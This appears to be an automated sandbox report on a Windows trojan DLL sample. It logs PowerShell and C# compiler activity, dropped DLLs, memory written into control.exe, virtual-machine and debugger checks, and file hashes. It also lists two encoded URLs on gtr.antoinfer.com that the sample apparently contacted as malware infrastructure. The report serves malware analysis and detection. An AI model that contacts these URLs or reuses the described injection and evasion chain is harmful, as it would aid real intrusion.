Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3222
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6117

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\a5q0nxag\a5q0nxag.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1t143vp1\1t143vp1.dll			Jump to dropped file

Source: explorer.exe, 0000001B.00000000.921725323.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001B.00000002.942705126.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 0000001B.00000002.943121292.0000000006650000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001B.00000000.921725323.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001B.00000000.913161767.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 0000001B.00000002.942705126.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 0000001B.00000000.921894821.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 0000001B.00000002.942705126.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 0000001B.00000000.921956105.000000000A784000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: mshta.exe, 00000013.00000003.867403214.000002062688B000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001B.00000002.942705126.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Windows Analysis Report SecuriteInfo.com.Trojan.GenericKD.46602191.18619.30710

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4E03D3 mov eax, dword ptr fs:[00000030h]	0_2_6D4E03D3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4D7A74 mov eax, dword ptr fs:[00000030h]	0_2_6D4D7A74
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D510354 mov eax, dword ptr fs:[00000030h]	0_2_6D510354
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D510283 mov eax, dword ptr fs:[00000030h]	0_2_6D510283
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D50FE8A push dword ptr fs:[00000030h]	0_2_6D50FE8A

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4CBD99 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6D4CBD99
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4CF08E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6D4CF08E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4CC33F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6D4CC33F

Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF79A7612E0			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\control.exe base: 9E0000			Jump to behavior

Source: explorer.exe, 0000001B.00000000.903084812.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: loaddll32.exe, 00000000.00000002.916548304.0000000001300000.00000002.00000001.sdmp, explorer.exe, 0000001B.00000002.929662607.0000000001080000.00000002.00000001.sdmp, control.exe, 0000001C.00000002.916658121.0000014B47120000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.916548304.0000000001300000.00000002.00000001.sdmp, explorer.exe, 0000001B.00000002.929662607.0000000001080000.00000002.00000001.sdmp, control.exe, 0000001C.00000002.916658121.0000014B47120000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.916548304.0000000001300000.00000002.00000001.sdmp, explorer.exe, 0000001B.00000002.929662607.0000000001080000.00000002.00000001.sdmp, control.exe, 0000001C.00000002.916658121.0000014B47120000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.916548304.0000000001300000.00000002.00000001.sdmp, explorer.exe, 0000001B.00000002.929662607.0000000001080000.00000002.00000001.sdmp, control.exe, 0000001C.00000002.916658121.0000014B47120000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000001B.00000000.921894821.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,	0_2_6D4A1E8A
Source: C:\Windows\System32\loaddll32.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_6D4E43D9
Source: C:\Windows\System32\loaddll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_6D4E4D3A
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6D4E4C6B
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6D4D9C0C
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6D4E4761
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_6D4E47EC
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6D4E467B
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6D4E46C6
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6D4DA0D3
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_6D4E4B65
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6D4E4A3F

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Name	Malicious	Antivirus Detection	Reputation
http://gtr.antoinfer.com/iJicPEzpWLt9kIte6bxUGY/_2BR7ODZwRNCt/zjY2vw66/miliEkUQv2irt3ku_2FqNHB/akyqFQ_2BU/yM9SZV6ME7y_2FqkK/It7SIsAlfzad/nxZBZ52awi6/psN6Yj3z7wNsMk/xQu7epV5m4ODSAWDxLy1j/Gk_2FldXWGNOMAHD/fQa5bj6bJuGJvLC/_2BINvzSWHR8aC2WFb/3FD_2BoRU/0ETns47no1FSMZrZVvpo/oidVSWsyBZKZQ2VvZTQ/apd5gJV2bxCtRREtLzEP23/aQrm19tIQuqLU/uXn4W8I5/0vUbA5p07eFzebEv_2BENSg/QJGoAud5ASp7/0hsFWY2nQ/G	true	Avira URL Cloud: safe	unknown
http://gtr.antoinfer.com/7Ep6sOqsiggMUz11gUp6a/qtvd4K5Z0K1BVqPW/RYWSd53MfmcNiV5/RE881azalII7Gf_2BB/LlVOlbNj6/RPZQwcj8bJhS19L7epbH/8FoJWjd_2B_2FoGw2Bm/R78HTVyDDDMhzpL_2B_2BC/NT4N_2BZc5JJ5/UVDvzetX/v8gnM8_2BpN7NJffSmXgZSS/qqPoPFwQjt/P6AxMC53uAUww_2Bc/nxUF1jZoiqDv/fS2kjrbVKTg/KntWa8B08GJbBA/JKUoQSoG69VvL_2FI3TFW/zn35_2FieOhXHllq/8OehjRVegYhlQWm/W_2BILGcprIvR338Fg/HNspl_2F5/DJjDkA4zF03Nn8/04W	true	Avira URL Cloud: safe	unknown

ID:	446378
Product:	CloudBasic
Start time:	13:44:11
Start date:	09.07.2021
Sample:	SecuriteInfo.com.Trojan.GenericKD.46602191.18619.30710
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	f3be390b01c85970deeae124ca36ce2d
SHA1:	93114ecf1b2c711ec10e1fafdc834393efc11a97
SHA256:	4eef8b6a5bcd808cd0ab0e33efcea2c2f9a36abe556e56556de8550383c9d3ce
Filetype:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{46823121-E0AB-11EB-90EB-ECF4BBEA1588}.dat	Microsoft Word Document	B338580E65AC963AB1803776F3A4C0C4	6F96C684B4B46C9EB12AA4BACAF8D6FEC869C802	73A28BA03B0218FF52C0506F966BA84B49EE6202BA97A397298347C856B4A224
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{46823123-E0AB-11EB-90EB-ECF4BBEA1588}.dat	Microsoft Word Document	545536773E7210974A39439C43533C60	A0E548734E0CBE1F737DA445CE2BDE96AFC7F62C	21D544467589F5E794E2014DE0C02D3D771D2078882064C11949C83FC47852E3
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{46823125-E0AB-11EB-90EB-ECF4BBEA1588}.dat	Microsoft Word Document	146C14FE70F2DB5916FC4DFC39FA69B1	E38CED01D22DBE0F6268D714BDF2AD5E35395078	6195E0B311FD05D3523ADE2F1C955D86B09D782056E3D142954A8D7187E2302F
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{4CE81F43-E0AB-11EB-90EB-ECF4BBEA1588}.dat	Microsoft Word Document	F491A462C6FA12678B860B34442D3391	1259DF5A128BBB55F592022EFDDD47C77FA76D5E	261BC3D745FD9B41935E3B5308B30580203800561C3FD725C1CD733628E6B270
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Y[1].htm	ASCII text, with very long lines, with no line terminators	551D610AB28E2FA1D45F38FB17F165BB	CD94C081766B277A08DBDE62EA34B0E8EB73BA67	150199FDE5CEF83225A5981568F73C2F9FA36E7D5D98C25A05FACCBC76D8E96C
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\04W[1].htm	ASCII text, with very long lines, with no line terminators	08FF6EA95709ECCD2B18301DCA6EAD36	469301BA96736DCD6E881F50D86AF5320A75C26A	F19D71EDF9EC0442F39B771CEC6C9A0BFBAA991C1CCA6EBF6E99CC1C0D827750
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\G[1].htm	ASCII text, with very long lines, with no line terminators	A2224302946ACCE38437F9307221542B	290E519A95F8AE7E4A00DAF1167B8B825D1573E3	47232537A605E7A1384906C71CEF74BB1C2C532F2D0C1B54AF2FAC5346B9AB45
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	7A57D8959BFD0B97B364F902ACD60F90	7033B83A6B8A6C05158BC2AD220D70F3E6F74C8F	47B441C2714A78F9CFDCB7E85A4DE77042B19A8C4FA561F435471B474B57A4C2
C:\Users\user\AppData\Local\Temp\1t143vp1\1t143vp1.0.cs	UTF-8 Unicode (with BOM) text	7AA3FC33397BFFFA079B36CE563F9E99	ED2E6C762455A174FE2AB65706E983AD72EA4C92	E6193F14533B8AFD2B7DB90319229D6CD88B68C7A7F52DE182DDF0858F7579A6
C:\Users\user\AppData\Local\Temp\1t143vp1\1t143vp1.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	708A890B467B0928D8B36DA94ABC5521	462E07BD533F5067E67CF2117A4B1EC7473F5321	DF474248B86185C0C0E3797EA9DCBDA894326FC5E51CEDA5EC219DEE18EB1168
C:\Users\user\AppData\Local\Temp\1t143vp1\1t143vp1.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	A8BBA1AE6FB49338714A83644D06A6EA	8D8CE2017D7309946682FB8E3B1D43C5340C057C	AD046F4C145E62B8C4F8F09E1105A125EEE5F0D51D2D9A16A3A02C97925A627E
C:\Users\user\AppData\Local\Temp\1t143vp1\1t143vp1.out	ASCII text, with CRLF, CR line terminators	83B3C9D9190CE2C57B83EEE13A9719DF	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
